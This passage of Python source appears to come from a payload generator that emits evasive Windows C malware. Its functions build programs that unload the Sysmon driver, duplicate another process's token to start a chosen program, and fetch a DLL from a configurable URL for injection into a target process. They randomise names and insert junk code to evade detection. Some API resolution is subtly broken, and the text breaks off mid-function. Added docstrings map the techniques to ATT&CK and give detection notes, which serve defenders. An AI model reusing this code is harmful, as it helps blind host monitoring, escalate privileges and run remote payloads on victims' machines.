def Postex_C_UnloadSysmonDriver_windows(ModOpt):
    """Generate C source that unloads the Sysmon minifilter and write it to Source.c.

    The emitted program enables SeLoadDriverPrivilege on its own process
    token (OpenProcessToken, LookupPrivilegeValue, AdjustTokenPrivileges)
    and then calls FilterUnload("SysmonDrv") through a pointer resolved from
    fltlib.dll. In MITRE ATT&CK terms this is defense impairment
    (T1562.001, Impair Defenses: Disable or Modify Tools).

    Args:
        ModOpt: option dict. Keys read here: "Outformat" ("exe" or "dll"),
            "Reflective" (read only when "Outformat" is "dll"), "DynImport",
            "JI", "JF" and "EF". When "DynImport" is true, the keys
            "NtdllHandle", "Ker32Handle" and "AdvapiHandle" are overwritten
            with fresh identifiers. The dict is also passed to WindowsDefend.

    Returns:
        None. The generated text is handed to WriteSource("Source.c", ...).

    Detection notes: what the emitted program does is visible to a defender
    as a process that is not a driver installer enabling
    SeLoadDriverPrivilege, a FilterUnload request naming SysmonDrv, and
    Sysmon events from the host stopping abruptly. The Filter Manager unload
    record in the System log and Sysmon's own error event are the usual
    artefacts; confirm both against local telemetry.
    """

    # Identifiers used as C variable names in the emitted source.
    # NOTE(review): varname_creator is defined elsewhere; presumably it
    # returns a random valid C identifier -- confirm.
    RandhToken = varname_creator()
    RandTokenPriv = varname_creator()
    RandLuid = varname_creator()
    NdcFilterUnload = varname_creator()

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n"]

    # NOTE(review): IncludeShuffler is defined elsewhere; presumably it
    # returns the include lines in a varied order -- confirm.
    Ret_code += IncludeShuffler(IncludeList)

    # Open the entry point. Any "Outformat" other than "exe" or "dll" emits
    # no wrapper at all (there is no else branch).
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":
        
        if ModOpt["Reflective"] == True:
            
            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        # The handle variable names are stored in ModOpt. This function only
        # reads "AdvapiHandle" afterwards; the other two may be used by
        # WindowsDefend(ModOpt) -- not visible from here.
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        ModOpt["AdvapiHandle"] = varname_creator()
        
        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are not C. NOTE(review): presumably
    # they are section markers consumed by JunkInjector below -- confirm.
    Ret_code += "$:START\n"

    # NOTE(review): WindowsDefend is defined elsewhere; its output is
    # inserted between the START and EVA markers.
    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "HANDLE " + RandhToken + ";\n"

    # Both branches emit the same privilege-enable sequence and each leaves
    # three "if(...){" blocks open. The DynImport branch calls the advapi32
    # functions through FARPROC pointers obtained with GetProcAddress, so
    # the calls do not appear as direct references in the emitted source.
    if ModOpt["DynImport"] == True:

        NdcOPT = varname_creator()
        NdcATP = varname_creator()
        NdcLPV = varname_creator()

        Ret_code += "FARPROC " + NdcOPT + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"OpenProcessToken\");\n"
        Ret_code += "if(" + NdcOPT + "(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
        Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
        Ret_code += "LUID " + RandLuid + ";\n"
        Ret_code += "FARPROC " + NdcLPV + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"LookupPrivilegeValue\");\n"
        Ret_code += "if(" + NdcLPV + "(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
        Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
        Ret_code += "FARPROC " + NdcATP + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"AdjustTokenPrivileges\");\n"
        Ret_code += "if(" + NdcATP + "(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"
    else:
        Ret_code += "if(OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
        Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
        Ret_code += "LUID " + RandLuid + ";\n"
        Ret_code += "if (LookupPrivilegeValue(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
        Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
        Ret_code += "if(AdjustTokenPrivileges(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"

    # FilterUnload is resolved with GetProcAddress whatever "DynImport"
    # says. The trailing "}}}" closes the three if-blocks opened above.
    Ret_code += "FARPROC " + NdcFilterUnload + " = GetProcAddress(GetModuleHandle(\"fltlib.dll\"),\"FilterUnload\");\n"
    Ret_code += "HRESULT unload = " + NdcFilterUnload + "(\"SysmonDrv\");}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # NOTE(review): JunkInjector is defined elsewhere; it receives the
    # source with its markers plus the JI/JF/EF options and returns the
    # text that replaces Ret_code.
    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],False)

    # Close the entry point opened at the top: main(), or the
    # DLL_PROCESS_ATTACH block followed by DllMain itself.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
def Privesc_C_DuplicateTokenEx_windows(ModOpt):
    """Generate C source that starts a program under another process's token.

    The emitted program opens the process whose PID is ModOpt["TargetPid"]
    with PROCESS_ALL_ACCESS, opens its token, duplicates it as a primary
    token (DuplicateTokenEx with TokenPrimary) and hands the duplicate to
    CreateProcessWithTokenW with ModOpt["Binpath"] as the command-line
    argument. In MITRE ATT&CK terms this is Access Token Manipulation
    (T1134.001 Token Impersonation/Theft, T1134.002 Create Process with
    Token). The result is written to Source.c.

    Args:
        ModOpt: option dict. Keys read here: "Binpath", "TargetPid",
            "Outformat" ("exe" or "dll"), "Reflective" (read only when
            "Outformat" is "dll"), "DynImport", "JI", "JF" and "EF". When
            "DynImport" is true, the keys "NtdllHandle", "Ker32Handle" and
            "AdvapiHandle" are overwritten. The dict is also passed to
            WindowsDefend.

    Returns:
        None. The generated text is handed to WriteSource("Source.c", ...).

    Detection notes: what the emitted program does is visible to a defender
    as a process handle opened with PROCESS_ALL_ACCESS on another process
    (Sysmon event ID 10 records process access), followed by a process
    creation whose user differs from that of the creating process.
    """

    # Both values are concatenated into the C text as-is below, so they must
    # already be str; no escaping or validation is applied in this function.
    Binpath = ModOpt["Binpath"]
    Pidtarget = ModOpt["TargetPid"]

    # Identifiers used as C variable names in the emitted source.
    # NOTE(review): varname_creator is defined elsewhere; presumably it
    # returns a random valid C identifier -- confirm.
    Randprochandle = varname_creator()
    Randtokenhandle = varname_creator()
    RandDuphandle = varname_creator()
    Randsi = varname_creator()
    Randpi = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    # NOTE(review): IncludeShuffler is defined elsewhere; presumably it
    # returns the include lines in a varied order -- confirm.
    Ret_code += IncludeShuffler(IncludeList)

    # Open the entry point. Any "Outformat" other than "exe" or "dll" emits
    # no wrapper at all (there is no else branch).
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # First set of module-handle declarations, emitted before the START
    # marker. These names are the ones in ModOpt when WindowsDefend(ModOpt)
    # runs; they are replaced again after that call (see below).
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are not C. NOTE(review): presumably
    # they are section markers consumed by JunkInjector below -- confirm.
    Ret_code += "$:START\n"

    # NOTE(review): WindowsDefend is defined elsewhere; its output is
    # inserted after the START marker.
    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    # Second set of module-handle declarations under new names. The
    # "NtdllHandle" and "Ker32Handle" entries written above are overwritten
    # here, so the rest of this function refers only to these later names.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        ModOpt["AdvapiHandle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"

    Ret_code += "$:EVA\n"

    # Declarations shared by both branches: the two token handles and the
    # zeroed STARTUPINFOW / PROCESS_INFORMATION passed to the process call.
    Ret_code += "HANDLE " + Randtokenhandle + " = NULL;\n"
    Ret_code += "HANDLE " + RandDuphandle + " = NULL;\n"
    Ret_code += "STARTUPINFOW " + Randsi + ";\n"
    Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
    Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(STARTUPINFOW));\n"
    Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(PROCESS_INFORMATION));\n"
    Ret_code += Randsi + ".cb = sizeof(STARTUPINFO);\n"

    # Both branches emit the same four-call sequence (OpenProcess,
    # OpenProcessToken, DuplicateTokenEx, CreateProcessWithTokenW). The
    # DynImport branch calls each API through a FARPROC pointer obtained
    # with GetProcAddress, so the calls do not appear as direct references
    # in the emitted source. No return value is checked in the emitted code.
    if ModOpt["DynImport"] == True:
        NdcOP = varname_creator()
        NdcOPT = varname_creator()
        NdcDTE = varname_creator()
        NdcCPWTW = varname_creator()

        Ret_code += "FARPROC " + NdcOP + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "FARPROC " + NdcOPT + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ",\"OpenProcessToken\");\n"
        Ret_code += "FARPROC " + NdcDTE + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ",\"DuplicateTokenEx\");\n"
        Ret_code += "FARPROC " + NdcCPWTW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ",\"CreateProcessWithTokenW\");\n"
        Ret_code += "HANDLE " + Randprochandle + " = " + NdcOP + "(PROCESS_ALL_ACCESS,TRUE," + Pidtarget + ");\n"
        Ret_code += NdcOPT + "(" + Randprochandle + ", TOKEN_ALL_ACCESS, &" + Randtokenhandle + ");\n"
        Ret_code += NdcDTE + "(" + Randtokenhandle + ", TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &" + RandDuphandle + ");\n"
        Ret_code += NdcCPWTW + "(" + RandDuphandle + ", LOGON_WITH_PROFILE, NULL,\"" + Binpath + "\", 0, NULL, NULL, &" + Randsi + ", &" + Randpi + ");\n"

    else:

        Ret_code += "HANDLE " + Randprochandle + " = OpenProcess(PROCESS_ALL_ACCESS,TRUE," + Pidtarget + ");\n"
        Ret_code += "OpenProcessToken(" + Randprochandle + ", TOKEN_ALL_ACCESS, &" + Randtokenhandle + ");\n"
        Ret_code += "DuplicateTokenEx(" + Randtokenhandle + ", TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &" + RandDuphandle + ");\n"
        Ret_code += "CreateProcessWithTokenW(" + RandDuphandle + ", LOGON_WITH_PROFILE, NULL,L\"" + Binpath + "\", 0, NULL, NULL, &" + Randsi + ", &" + Randpi + ");\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # NOTE(review): JunkInjector is defined elsewhere; it receives the
    # source with its markers plus the JI/JF/EF options and returns the
    # text that replaces Ret_code.
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    # Close the entry point opened at the top: main(), or the
    # DLL_PROCESS_ATTACH block followed by DllMain itself.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def DownloadExecDll_C_windows(ModOpt):

    UrlTarget = ModOpt["UrlTarget"]
    Filesize = ModOpt["Filesize"]

    RandvarFsize = varname_creator()
    RandhProcess = varname_creator()
    Randentry = varname_creator()
    RandProcsnapshot = varname_creator()
    Randlpv = varname_creator()
    Randpointer = varname_creator()
    RandhInternet = varname_creator()
    RandhURL = varname_creator()
    RandvarBRead = varname_creator()
    RandvarBWritten = varname_creator()
    RandisRead = varname_creator()
    Randflag = varname_creator()
    RandhThread = varname_creator()
    Randlpv2 = varname_creator()

    ModOpt["Lpvoid"] = Randlpv

    CryptFile(ModOpt)

    if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:

        RandRvaParam = varname_creator()
        RandBaseAddrParam = varname_creator()
        RandFuncRva2Offset = varname_creator()
        RandIndex = varname_creator()
        RandSectHeader = varname_creator()
        RandNtHeader = varname_creator()
        RandBaseAddr = varname_creator()
        RandExportDir = varname_creator()
        RandArrName = varname_creator()
        RandArrAddr = varname_creator()
        RandOrdName = varname_creator()
        RandLoaderOffset = varname_creator()
        RandExportedFunc = varname_creator()
        RandCounter = varname_creator()

    elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:

        RandLoadLib = varname_creator()
        RandGetProcAddr = varname_creator()
        RandPdllMain = varname_creator()
        RandLoadStruct = varname_creator()
        RandImgDosHeader = varname_creator()
        RandImgNTHeader = varname_creator()
        RandImgSectHeader = varname_creator()
        RandhModule = varname_creator()
        Randflag2 = varname_creator()
        RandvarFunc = varname_creator()
        RandvarList = varname_creator()
        RandImgImport = varname_creator()
        RandvarEntry = varname_creator()
        RandvarDelta = varname_creator()
        RandPtrLoader = varname_creator()
        RandImgBaseReloc = varname_creator()
        RandImgImportDesc = varname_creator()
        RandFirstT = varname_creator()
        RandOrigFirstT = varname_creator()
        RandImgEntryTls = varname_creator()
        RandTlsDir = varname_creator()
        RandCallback = varname_creator()
        RandLoaderMem = varname_creator()


    Ret_code = ""

    IncludeList = ["#include <stdlib.h>\n","#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <time.h>\n","#include <math.h>\n"]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    Ret_code += "#include <wininet.h>\n"

    if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:

        Ret_code += "DWORD " + RandFuncRva2Offset + "( DWORD " + RandRvaParam + ", UINT_PTR " + RandBaseAddrParam + " ){\n"
        Ret_code += "WORD " + RandIndex + " = 0;\n"
        Ret_code += "PIMAGE_SECTION_HEADER " + RandSectHeader + " = NULL;\n"
        Ret_code += "PIMAGE_NT_HEADERS " + RandNtHeader + " = NULL;\n"
        Ret_code += RandNtHeader + " = (PIMAGE_NT_HEADERS)(" + RandBaseAddrParam + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddrParam + ")->e_lfanew);\n"
        Ret_code += RandSectHeader + " = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&" + RandNtHeader + "->OptionalHeader) + " + RandNtHeader + "->FileHeader.SizeOfOptionalHeader);\n"
        Ret_code += "if( " + RandRvaParam + " < " + RandSectHeader + "[0].PointerToRawData )\n"
        Ret_code += "return " + RandRvaParam + ";\n"
        Ret_code += "for( " + RandIndex + "=0 ; " + RandIndex + " < " + RandNtHeader + "->FileHeader.NumberOfSections ; " + RandIndex + "++ ){\n"
        Ret_code += "if( " + RandRvaParam + " >= " + RandSectHeader + "[" + RandIndex + "].VirtualAddress && " + RandRvaParam + " < (" + RandSectHeader + "[" + RandIndex + "].VirtualAddress + " + RandSectHeader + "[" + RandIndex + "].SizeOfRawData) )\n"
        Ret_code += "return ( " + RandRvaParam + " - " + RandSectHeader + "[" + RandIndex + "].VirtualAddress + " + RandSectHeader + "[" + RandIndex + "].PointerToRawData );}\n"
        Ret_code += "return 0;}\n"

    elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:

        Ret_code += "typedef HMODULE (WINAPI * " + RandLoadLib + ")(LPCSTR);\n"
        Ret_code += "typedef FARPROC (WINAPI * " + RandGetProcAddr+ ")(HMODULE,LPCSTR);\n"
        Ret_code += "typedef BOOL (WINAPI * " + RandPdllMain + ")(HMODULE,DWORD,LPVOID);\n"
        #Ret_code += "typedef BOOL (NTAPI *pRtlAddFunctionTable)(PRUNTIME_FUNCTION,DWORD,DWORD64);\n"
 
        Ret_code += "typedef struct _" + RandLoadStruct + "{"
        Ret_code += "LPVOID ImageBase;"
        Ret_code += "PIMAGE_NT_HEADERS NtHeaders;"
        Ret_code += "PIMAGE_BASE_RELOCATION BaseRelocation;"
        Ret_code += "PIMAGE_IMPORT_DESCRIPTOR ImportDirectory;"
        Ret_code += RandLoadLib + " fnLoadLibraryA;"
        Ret_code += RandGetProcAddr+ " fnGetProcAddress;"
        #Ret_code += "pRtlAddFunctionTable fnRtlAddFunctionTable;\n"
        Ret_code += "}" + RandLoadStruct + ",*P" + RandLoadStruct + ";\n"
 
        Ret_code += "static SIZE_T WINAPI LoadDll(LPVOID p){\n"
        Ret_code += "P" + RandLoadStruct + " " + RandPtrLoader+ " = (P" + RandLoadStruct + ")p;\n"
        Ret_code += "HMODULE " + RandhModule + ";\n"
        Ret_code += "DWORD " + Randflag2 + "," + Randflag + ";\n"
        Ret_code += "DWORD " + RandvarFunc + ";\n"
        Ret_code += "PWORD " + RandvarList + ";\n"
        Ret_code += "PIMAGE_IMPORT_BY_NAME " + RandImgImport + ";\n"
        Ret_code += RandPdllMain + " " + RandvarEntry+ ";\n"
        Ret_code += "SIZE_T " + RandvarDelta+ ";\n"
        Ret_code += RandvarDelta+ "=(SIZE_T)((LPBYTE)" + RandPtrLoader+ "->ImageBase-" + RandPtrLoader+ "->NtHeaders->OptionalHeader.ImageBase);\n"
        Ret_code += "if(" + RandvarDelta+ " != 0){\n"
        Ret_code += "PIMAGE_BASE_RELOCATION " + RandImgBaseReloc+ " = " + RandPtrLoader+ "->BaseRelocation;\n"
        Ret_code += "while(" + RandImgBaseReloc+ "->VirtualAddress){\n"
        Ret_code += "if(" + RandImgBaseReloc+ "->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION)){\n"
        Ret_code += Randflag + "=(" + RandImgBaseReloc+ "->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);\n"
        Ret_code += RandvarList + "=(PWORD)(" + RandImgBaseReloc+ "+1);\n"
        Ret_code += "for(" + Randflag2 + "=0;" + Randflag2 + "<" + Randflag + ";" + Randflag2 + "++){\n"
        Ret_code += "if(" + RandvarList + "[" + Randflag2 + "]){\n"
        Ret_code += "PDWORD ptr=(PDWORD)((LPBYTE)" + RandPtrLoader+ "->ImageBase+(" + RandImgBaseReloc+ "->VirtualAddress+(" + RandvarList + "[" + Randflag2 + "] & 0xFFF)));\n"
        Ret_code += "*ptr+=" + RandvarDelta+ ";}}}\n"
        Ret_code += RandImgBaseReloc+ "=(PIMAGE_BASE_RELOCATION)((LPBYTE)" + RandImgBaseReloc+ "+" + RandImgBaseReloc+ "->SizeOfBlock);}}\n"
        Ret_code += "PIMAGE_IMPORT_DESCRIPTOR " + RandImgImportDesc+ " = " + RandPtrLoader+ "->ImportDirectory;\n"
        Ret_code += "PIMAGE_THUNK_DATA " + RandFirstT+ "," + RandOrigFirstT+ ";\n"
        Ret_code += "while(" + RandImgImportDesc+ "->Characteristics){\n"
        Ret_code += RandOrigFirstT + "=(PIMAGE_THUNK_DATA)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "->OriginalFirstThunk);\n"
        Ret_code += RandFirstT+ "=(PIMAGE_THUNK_DATA)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "-> FirstThunk);\n"
        Ret_code += RandhModule + "=" + RandPtrLoader+ "->fnLoadLibraryA((LPCSTR)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "->Name);\n"
        Ret_code += "while(" + RandOrigFirstT+ "->u1.AddressOfData){\n"
        Ret_code += "if(" + RandOrigFirstT+ "->u1.Ordinal & IMAGE_ORDINAL_FLAG){\n"
        Ret_code += RandvarFunc + "=(DWORD)" + RandPtrLoader+ "->fnGetProcAddress(" + RandhModule + ",(LPCSTR)(" + RandOrigFirstT+ "->u1.Ordinal & 0xFFFF)); \n"
        Ret_code += RandFirstT+ "->u1.Function=" + RandvarFunc + ";}\n"
        Ret_code += "else{\n"
        Ret_code += RandImgImport + "=(PIMAGE_IMPORT_BY_NAME)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandOrigFirstT+ "->u1.AddressOfData);\n"
        Ret_code += RandvarFunc + "=(DWORD)" + RandPtrLoader+ "->fnGetProcAddress(" + RandhModule + ",(LPCSTR)" + RandImgImport + "->Name);\n"
        Ret_code += RandFirstT+ "->u1.Function=" + RandvarFunc + ";}\n"
        Ret_code += RandOrigFirstT+ "++;\n"
        Ret_code += RandFirstT+ "++;}" + RandImgImportDesc+ "++;}\n"
        #Ret_code += "IMAGE_DATA_DIRECTORY " + RandImgEntryTls+ " = " + RandPtrLoader+ "->NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];\n"
        #Ret_code += "if(" + RandImgEntryTls+ ".VirtualAddress != 0){\n"
        #Ret_code += "PIMAGE_TLS_DIRECTORY " + RandTlsDir+ " = (PIMAGE_TLS_DIRECTORY)((LPBYTE)" + RandPtrLoader+ "->ImageBase + " + RandImgEntryTls+ ".VirtualAddress);\n"
        #Ret_code += "PIMAGE_TLS_CALLBACK *" + RandCallback+ " = (PIMAGE_TLS_CALLBACK *)" + RandTlsDir+ "->AddressOfCallBacks;\n"
        #Ret_code += "if(" + RandCallback+ "){\n"
        #Ret_code += "while (*" + RandCallback+ "){\n"
        #Ret_code += "(*" + RandCallback+ ")((HMODULE)" + RandPtrLoader + "->ImageBase, DLL_PROCESS_ATTACH, NULL);\n"
        #Ret_code += RandCallback+ "++;}}}\n"
 
        Ret_code += "if(" + RandPtrLoader+ "->NtHeaders->OptionalHeader.AddressOfEntryPoint){\n"
        Ret_code += RandvarEntry+ "=( " + RandPdllMain + ")((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandPtrLoader+ "->NtHeaders->OptionalHeader.AddressOfEntryPoint);\n"
        Ret_code += "return " + RandvarEntry+ "((HMODULE)(" + RandPtrLoader+ "->ImageBase),DLL_PROCESS_ATTACH,NULL);}\n"
        Ret_code += "return TRUE;}\n"

        Ret_code += "static SIZE_T WINAPI LoadDllEnd(){return 0;}\n"

    #Ret_code += "#define CountRelocationEntries(dwBlockSize) (dwBlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY)\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
    Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        Wininet = varname_creator()
        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n" 
        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + Wininet + ", \"CreateToolhelp32Snapshot\");\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + Wininet + ", \"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + Wininet + ", \"Process32Next\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "if(" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while(" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile,\"" + ModOpt["ProcTarget"] + "\") == 0){\n"
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + Wininet + ", \"OpenProcess\");\n"
        Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"

    else:

        Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile,\"" + ModOpt["ProcTarget"] + "\") == 0){\n"
        Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"


    Ret_code += "int " + RandvarFsize + " = " + ModOpt["Filesize"] + ";\n"
    Ret_code += "DWORD " + RandvarBWritten +  " = 0;\n"

    if ModOpt["DynImport"] == True:

        NdcInternetOpenA = varname_creator()
        NdcInternetOpenUrl = varname_creator()
        NdcVirtualAlloc = varname_creator()
        NdcInternetReadFile = varname_creator()
 
        Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
        Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if(" + RandhInternet + " != NULL){\n"
        Ret_code += "FARPROC " + NdcInternetOpenUrl + " = GetProcAddress(" + Wininet + ", \"InternetOpenUrl\");\n"
        Ret_code += "HINTERNET " + RandhURL + " = (HINTERNET)" + NdcInternetOpenUrl + "(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE | INTERNET_FLAG_NO_CACHE_WRITE, 0);\n"
        Ret_code += "FARPROC " + NdcVirtualAlloc + " = GetProcAddress(" + Wininet + ", \"VirtualAlloc\");\n"
        Ret_code += "unsigned char * " + Randlpv + " = (LPVOID)" + NdcVirtualAlloc + "(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "DWORD " + RandvarBRead + ";\n"
        Ret_code += "do{\n"
